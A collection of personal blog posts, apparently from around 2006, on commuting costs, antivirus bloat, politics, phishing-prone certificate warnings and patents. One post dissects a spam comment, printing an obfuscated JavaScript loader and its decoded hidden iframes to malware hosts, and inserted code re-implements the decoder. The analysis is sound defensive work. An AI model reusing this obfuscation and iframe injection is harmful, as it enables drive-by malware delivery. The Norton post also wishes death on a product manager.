The Cost of a Commute

Here is a look at what my per-day cost of commuting is.  Since I now take the Google shuttle, I am interested in how much I save by not driving.

The simple computation rests on the price of gas, which, thankfully, has fallen a bit.  But a more accurate computation would take into account the actual wear and tear on the auto as well.

For me, I drive a car which cost about $25,000, and I expect to use it for about 150,000 miles, and then sell it for about $2,000.  That means on a per mile basis, it costs about $0.15.  Fuel, at $2.45 per gallon and 45mpg, costs a little over $0.05 per mile.  I’m intentionally not accounting for insurance or maintenance, because I do need a car, and even without a commute, I would incur these expenses.  This calculation is merely the cost of driving each day to work.

Well, with a per-mile cost of $0.207, and a round trip of 85 miles, the shuttle saves me $17.66 per trip. 

Norton AntiVirus is the Worst Program Ever

I made the mistake of installing Norton AntiVirus as part of Google Pack.  I guess I thought I would be nice to my new employer and try out the Pack. 

I’ve tried Norton a few times in the past – each time I uninstall it because it is a total system hog.  Once again, I’ve had the same experience.

My laptop is a few years old; it’s only got 256MB of RAM, but it runs fine.  But today, the first time booting since installing Norton, it took me 15 minutes to regain control of the system (this is not an exaggeration!!  I couldn’t get control of the mouse, the task manager, nothing for 15 minutes!).  Norton just completely monopolizes the disk and CPU.

It’s no wonder viruses spread so easily.  Norton has turned into the same bloatware you’d expect from Adobe or Microsoft, so of course users disable it.  It sucks.  Yes, Norton, we want you to scan for viruses.  But no, this is not permission to completely rape and pillage our hardware and prevent us from getting our work done.

Well, the uninstall of Norton is just about done now, so I’m done with this blog entry.  I hope the numbskull PM at Norton that thought that “well, if users can’t see that it is scanning we won’t get brand recognition” dies a cruel and horrible death.  I’ll be working hard within my company to make sure we get Norton out of the Google Pack.  It just isn’t Googley.

Avoiding Automated Account Creation

For several years, many sites have been using “CAPTCHAs” to ensure there is a real person signing up for an account.  We’ve all seen them – these are the questions where the user is asked to type in the letters of a distorted image before proceeding to the next step.

I just went to create a new GMail account, and I pleasantly discovered a new system, hopefully even more tricky for spammers to work around.  The GMail system requires that it be able to send an SMS message to your cellphone before it will let you create an account.  They will only allow 10 accounts per phone number to sign up.  So, even if the spammer manages to get 100 phones, he’s still not getting a very large number of GMail accounts. 

Of course, if you don’t have an SMS-capable cell-phone, I guess you are out-of-luck!  Maybe others have seen this already and I’m slow to notice.  But I thought this was pretty cool.
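A per-phone-number signup cap like the one described above, as an added example that is not part of the original post. The normalization step is my own addition: without it, one phone written with spaces, dashes or a leading country code would count as several numbers and the cap would be easy to sidestep. All values are constructed.

```javascript
// Added example, not from the post: a per-phone-number signup cap like the
// one described (10 accounts per number). The normalization step is my own
// addition: without it, one phone written with spaces, dashes or a leading
// country code would count as several numbers. All values are constructed.
const MAX_ACCOUNTS_PER_NUMBER = 10;
const accountsByNumber = new Map(); // normalized number -> accounts created

function normalizePhone(raw) {
  // Keep digits only and treat a bare 10-digit number as a US number.
  let digits = raw.replace(/\D/g, "");
  if (digits.length === 10) digits = "1" + digits;
  if (digits.length < 11 || digits.length > 15) {
    throw new Error("not a plausible phone number: " + raw);
  }
  return "+" + digits;
}

// Returns whether the signup may proceed and how many accounts the number
// has been used for; sending the SMS code itself is left to the caller.
function registerAccount(rawPhone) {
  const phone = normalizePhone(rawPhone);
  const used = accountsByNumber.get(phone) || 0;
  if (used >= MAX_ACCOUNTS_PER_NUMBER) return { ok: false, phone, used };
  accountsByNumber.set(phone, used + 1);
  return { ok: true, phone, used: used + 1 };
}
```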

Democrats vs Republicans – Lousy Choices

The Republicans got trounced yesterday with their “stay the course” policy.  Hooray!  Maybe now we’ll get out of Iraq and bring the troops home.  Everyone except our President knows that the battle is over and the rest of the “job in Iraq” can only be done by Iraqis themselves. 

But, why is it that in order to end the war we have to choose to elect the Democrats?  We’ve successfully kept them out of control in the House since 1995, and for good reason.  Now, don’t get me wrong, if I have to choose between the war in Iraq and electing Democrats, I’ll take the Democrats.  But this is a really awful choice.  Why can’t we keep the Republicans in the House and get out of Iraq?

If you don’t know what I’m talking about, you should read Nancy Pelosi’s e-book.  She clearly states what she is all about:  taxes and social programs.

Here are her 6 tenets for 2006:

1) Defense.  She wants to double the size of the military with a variety of expensive campaigns.  Well, anything is cheaper than war, I guess.
2) Raise the minimum wage.  (In other words, cause unemployment)
3) College.  Make college tuition tax deductible permanently, cut student loan interest rates, increase Grants, NSF, etc.  (In other words, increase taxes)
4) Energy.  More incentives for energy-efficiency.  (In other words, increase taxes)
5) Affordable Health Care.  Lower prices for seniors.  (Remember the baby boomers?  In other words, increase taxes)
6) Protect Social Security.  Gov’t retirement matching.  Remember the Baby Boomers?  In other words, massively increase taxes.

The stage is definitely set for the democrats.  Bush’s war is going to be the rallying cry for Hillary Clinton in 2008.  Taxes… taxes…

I hate to say it, but it’s worth it as long as we get out of Iraq.

I wonder if George Bush realizes that his biggest legacy may not be the war in Iraq, but rather the depression he creates by forcing Americans to elect Democrats to get Bush to stop fighting this stupid war.

Hotmail Trains Users to be Phishing Victims

Since I know a few people at Microsoft on the Hotmail team, I’m hoping one of them will read this article and fix the problem. 

In short, Microsoft and Hotmail are helping internet users get phished due to Hotmail’s poor security practices.

There is a very nice summary of phishing techniques written up here.  One of the major problems they emphasize is how many existing and reputable sites condition users to ignore security.  Security is a tough enough problem to begin with, and the UI in our browsers is clearly deficient.  But on top of that, we’ve got companies like Microsoft not even practicing what they preach, and conditioning users to ignore security warnings.

My example today comes from Hotmail.  I’ve been seeing this problem for several months now, and I’m getting sick of it.  When you go to the hotmail site and try to login, you’ll be presented with a security dialog telling the user that the certificate is invalid.  Unless you are a 100%-pure geek like me, you probably don’t know why it is invalid, or even what it really means.  You do know that, in this case, you’ll probably get to read your email if you click OK.  So you ignore the problem.  WARNING – you could have just been phished.  And, when you go to the next site that presents that warning, what will you do?

This problem is very fixable.  Hotmail is in the process of changing the product name from hotmail to live mail, and they are redirecting in a way which exposes this problem.  This is really just laziness – it is a simple problem to fix: the certificate a server presents has to match the domain name the user actually lands on after the redirect.
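The name check a browser performs on a server certificate, as an added example that is not from the original post, to show why a redirect to a hostname the certificate does not cover trips the warning described above. The hostnames and the certificate object are constructed, and the matching rules are simplified.

```javascript
// Added example, not from the post: the hostname check a browser applies to
// a server certificate. The certificate and hostnames are constructed stand-ins
// for the redirect the post describes; the rules are simplified.
function labelMatches(pattern, label) {
  // A wildcard must be the whole label and stands for exactly one label.
  return pattern === "*" || pattern === label;
}

function hostMatchesName(host, name) {
  const h = host.toLowerCase().split(".");
  const n = name.toLowerCase().split(".");
  if (h.length !== n.length) return false;                    // "*" never spans labels
  if (n.slice(1).some((p) => p.includes("*"))) return false;  // wildcard only leftmost
  if (n[0] === "*" && n.length < 3) return false;             // refuse "*.com"
  return n.every((pattern, i) =>
    i === 0 ? labelMatches(pattern, h[i]) : pattern === h[i]);
}

function certCoversHost(cert, host) {
  // Browsers match against subjectAltName dNSNames; the subject CN has
  // historically been consulted only when no dNSNames are present.
  const names = cert.dnsNames.length ? cert.dnsNames : [cert.commonName];
  return names.some((name) => hostMatchesName(host, name));
}

// Constructed certificate standing in for the one the login page presents:
// it covers the old product's hosts, not the new one's.
const LOGIN_CERT = { commonName: "login.hotmail.example", dnsNames: ["*.hotmail.example"] };
```

With this certificate a redirect to login.live.example fails the check, which is exactly the dialog users are being trained to click through.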

When Microsoft won’t even configure their websites correctly, how can we expect the smaller and more ignorant companies to do so?  You might as well take all the dialog boxes in Internet Explorer and replace them with this (credit to University of Auckland for the image):

Don’t Let Spammers Take Office! (aka – Vote No on Pombo)

Q: What do you call it when a politician sends spam?
A: Campaigning.

I don’t have a lot of preference between Jerry McNerney and Richard Pombo.  But after 3 robo-calls from Pombo, he’s not getting my vote.  Further, if I get any robo-calls from other candidates, I’ll vote against them too.  Spammers are spammers whether it is email or phone calls.  If you don’t have the decency to talk to me on the phone, don’t call.  Since Richard Pombo supports this action, I can only conclude that he lacks common decency and does not deserve my vote.

I believe automated, unsolicited phone calls are against the law, but I do not have the patience to prove it.  As with most types of spam, the slimy spammers usually figure out a loophole.  Here is a good link if you are curious about automated phone dialing laws.  In the meantime, consider re-signing up for the national do-not-call list.  But I think I’m already on it, and it didn’t help me.

Lastly, vote NO ON Richard “Spamboy” Pombo!!!

Dissection of a Spam Comment

I get lots of spam comments on my blog each day.  Most are a similar looking spam with a bunch of links.  I moderate all comments to avoid spam, so none of this ever makes it to the site.  But today I got curious – what is this spam for?  Who sends it?

Manually following the URLs in my browser yields some javascript alerts where they are trying to get me to click “OK”.  Let’s see what happens if you do that.  It’s very interesting!

First off, you get the following script.  This is a complicated javascript masking technique.  Let’s look at the code.

   1:  <script>
   2:  function bNVEXM(inp)
   3:  {
   4:    var k="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh...
   5:    var out="";
   6:    var c1,c2,c3="";
   7:    var e1,e2,e3,e4="";
   8:    var i=0;
   9:    do {
  10:      e1=k.indexOf(inp.charAt(i++));
  11:      e2=k.indexOf(inp.charAt(i++));
  12:      e3=k.indexOf(inp.charAt(i++));
  13:      e4=k.indexOf(inp.charAt(i++));
  14:      c1=(e1<<2)|(e2>>4);
  15:      c2=((e2&15)<<4)|(e3>>2);
  16:      c3=((e3&3)<<6)|e4;
  17:      out+=String.fromCharCode(c1);
  18:      if(e3!=64){
  19:        out+=String.fromCharCode(c2)
  20:      };
  21:      if(e4!=64){
  22:        out+=String.fromCharCode(c3);
  23:      }
  24:    } while(i<inp.length);
  25:    return out;
  26:  }
  27:
  28:  function fDVGFV(a1,b1){
  29:    if(!b1){
  30:      return eval(bNVEXM("ZG9jdW1lbnQud3JpdGUo...
  31:    }
  32:    var i;
  33:    var o="";
  34:    var k=314;
  35:    a1=bNVEXM(a1);
  36:    for(i=0;i<a1.length;i++) {
  37:      o+=String.fromCharCode(
             (a1.charCodeAt(i)-32)^
              b1.charCodeAt((i%2)?i%k:Math.abs(k-i-1))%k);
  38:    }
  39:    return o;
  40:  }
  41:
  42:  fDVGFV('YVxJUVNEUW5BNpiaaV59NWE2Zj4hNCYyNmQqPy8+bmpj...
  43:  </script>

Pretty complicated, huh?  Well, it’s not too hard to decipher.  The main part is line 42, calling the function fDVGFV() with a single argument: an encrypted string of javascript code.  The helper bNVEXM() is just a hand-rolled base64 decoder.  When only one argument is passed in, line 30 runs: it base64-decodes a fixed string into a short piece of javascript (which refers to a1) and calls eval to run it.  That intermediate javascript happens to decode into the following single line:

   1:  document.write(fDVGFV(a1,arguments.callee.toString().replace(/s/g,"")));

So basically, it calls fDVGFV() a second time, now passing as the second argument the text of the function’s own source (arguments.callee.toString(), with some characters stripped).  The loop in lines 36-38 then base64-decodes the first argument and XORs each character against that source text as a key, which converts it to text that can be rendered.  Because the key is the function’s own source, any edit to the function (say, swapping the eval for something harmless to see what it would run) changes the key and breaks the decode – a cheap anti-analysis trick.  The final HTML output becomes (I added xxx to mangle the URLs):

<IFRAME SRC="http://xxxjoutweb.netxxx/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>
<IFRAME SRC="http://xxxfrlynx.infoxxx/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>
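The two decoding stages described above, re-implemented as an added example (not code from the spam or from the original post) so the payload can be recovered statically instead of being handed to eval. The base64 alphabet is assumed to be the standard one (the post truncates it), the function names are mine, and the key and HTML are constructed stand-ins.

```javascript
// Added example, not code from the post: the two decoding stages of the
// obfuscated script, re-implemented so the payload can be recovered
// statically. Names are mine; the alphabet is assumed to be standard base64.
const ALPHABET =
  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
const K = 314; // the constant k from line 34 of the sample

// Stage 1: the hand-rolled base64 decoder (bNVEXM in the sample).
function b64decode(inp) {
  let out = "", i = 0;
  do {
    const e1 = ALPHABET.indexOf(inp.charAt(i++));
    const e2 = ALPHABET.indexOf(inp.charAt(i++));
    const e3 = ALPHABET.indexOf(inp.charAt(i++));
    const e4 = ALPHABET.indexOf(inp.charAt(i++));
    out += String.fromCharCode((e1 << 2) | (e2 >> 4));
    if (e3 !== 64) out += String.fromCharCode(((e2 & 15) << 4) | (e3 >> 2));
    if (e4 !== 64) out += String.fromCharCode(((e3 & 3) << 6) | e4);
  } while (i < inp.length);
  return out;
}

// Stage 2: the XOR loop of lines 36-38. For even positions the key index
// mirrors around K, so a key shorter than K characters leaves the early
// even positions unkeyed (charCodeAt gives NaN, and x ^ NaN === x).
function keyByte(key, i) {
  const idx = (i % 2) ? i % K : Math.abs(K - i - 1);
  return key.charCodeAt(idx) % K;
}
function decodePayload(encoded, key) {
  const a1 = b64decode(encoded);
  let o = "";
  for (let i = 0; i < a1.length; i++)
    o += String.fromCharCode((a1.charCodeAt(i) - 32) ^ keyByte(key, i));
  return o;
}
// The inverse, used here only to build a constructed sample to decode.
function encodePayload(plain, key) {
  let a1 = "";
  for (let i = 0; i < plain.length; i++)
    a1 += String.fromCharCode((plain.charCodeAt(i) ^ keyByte(key, i)) + 32);
  return Buffer.from(a1, "latin1").toString("base64");
}

// Constructed stand-in for the script's own source text, which the real
// sample uses as the key via arguments.callee.toString().
const SAMPLE_KEY = "functionfDVGFV(a1,b1){if(!b1){returneval(...)}}".repeat(8);
const SAMPLE_HTML = '<IFRAME SRC="http://xxx.invalid/fr/?id=x" WIDTH=1 HEIGHT=1></IFRAME>';
const SAMPLE_ENCODED = encodePayload(SAMPLE_HTML, SAMPLE_KEY);
```

Decoding with a key that differs even by one substitution (the equivalent of editing the function before running it) yields garbage, which is why the real sample keys on its own source.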

These iframes are what actually load the final webpages into your browser.  After following through a few additional iframes, both of these will ultimately land you at a javascript dialog pushing SpySheriff (see WikiPedia’s description), a well known malware program.  The product is signed with a valid certificate issued by Thawte to HiPoint, Ltd, based out of Panama.  If you thought that digital signatures have any meaning with software, you are wrong.  A code-signing certificate vouches for who signed the software, not for what it does: anyone can sign software, even if it is malware…

I can’t seem to find anyone’s explanation of why SpySheriff exists.  But they employ a lot of code to try to get their junk distributed, and they are very persistent.  All this sophistication in their javascript is there to camouflage it so that spam-detection techniques don’t work.  It’s unfortunate that the javascript “eval” function exists at all – I happen to agree with Eric Lippert on this issue.  Eval is not really necessary, and it creates massive security issues for everyone in addition to helping jerks like SpySheriff circumvent spam detectors.  (See again WikiPedia on the subject)

It’s probably worth noting that this security problem, while commonly blamed on Microsoft’s IE, actually originates in Javascript itself, which was invented by Netscape way back in 1995 or so.  IE just copied it with bug-for-bug compatibility!  (Granted, that was over 10 years ago…)

Friendster now has lawyer-value: Patents

GigaOM writes that “Friendster just wrote in to tell us it has been granted a second social networking patent.”  Oh joy.

As I have written before, software patents don’t work.  Soon enough, we’ll see some lawyers talking to Friendster about going after MySpace, Orkut, LinkedIn, Tribe, Tagged, and others for violation of this silly patent.  The money is just too alluring.

Nobody Wins
Let’s say Friendster is right, and that the others are “infringing” (I am making no judgement, but let’s be hypothetical).  Nobody uses Friendster because their service has been miserable.  The service is slow and they just failed to build the right features.  Myspace, Facebook, and even Orkut, have all performed much better and have orders of magnitude more users.  If Friendster were to win a patent-infringement suit, these other companies will either have to pay Friendster hoards of cash (which will just be pocketed by lawyers), or stop offering these features, or both.  In any event – the users of social networking will be the losers – as the products they use will have fewer features and possibly even carry additional fees.  Keep in mind that none of this affected Friendster’s fall – they failed only due to their own poor execution.

Proof of Invalidity
Now, you could say that Friendster pioneered this space and that is why they got the patent.  But this is not true.  The notion of uploading pictures associated to a profile is too obvious and simple.  If you read the patent, you’ll see that covered under this patent would be the notion of uploading a picture to an access-controlled or moderated bulletin board (you have a group of registered users, and there is a “degree of separation” which is enforced via the access control).  Clearly, this was done years ago, and Friendster’s patent is invalid.  The USPO is just not capable of differentiating patent-worthy from bull. 

Sadly, there is a whole army of lawyers that will argue against my example, for they want their own piece of the pie, even if the only way to do it is to steal from those that actually created something useful.

How Times Change

FEBRUARY, 1999:  During testimony in federal court, Microsoft presents a video to show how Internet Explorer cannot be removed from Windows 98 without degrading system performance and other negative impacts.  Government attorney David Boies catches a small mistake in the video, and it is discovered that the video is actually spliced from two machines.  Microsoft’s Jim Allchin claims this was an honest mistake, that IE must be bundled into the operating system, and to remove it would hinder innovation. In the end, Microsoft wins the browser war.  (See also: NY Times)

OCTOBER, 2006:  Microsoft ships Internet Explorer 7, the first major release of a browser from Microsoft in several years.  Microsoft is no longer embroiled in competition with Netscape, and instead faces eroding market share by open-source rival Firefox.  Apparently whatever happened in 1999 which made IE so tightly coupled with the OS is now irrelevant, because this browser no longer has unified navigation with the shell (see here), can easily be installed and uninstalled, and even runs side-by-side with IE6.

I hate to look a gift horse in the mouth, but which one is it?  I guess technology has improved and now Microsoft has the technology to no longer bundle browsers.  Of course, Netscape had this technology in 1993.  On the positive side, IE7 is a huge leap forward, and it’s great that users can choose to either use IE6, IE7, or Firefox.  Choice is good!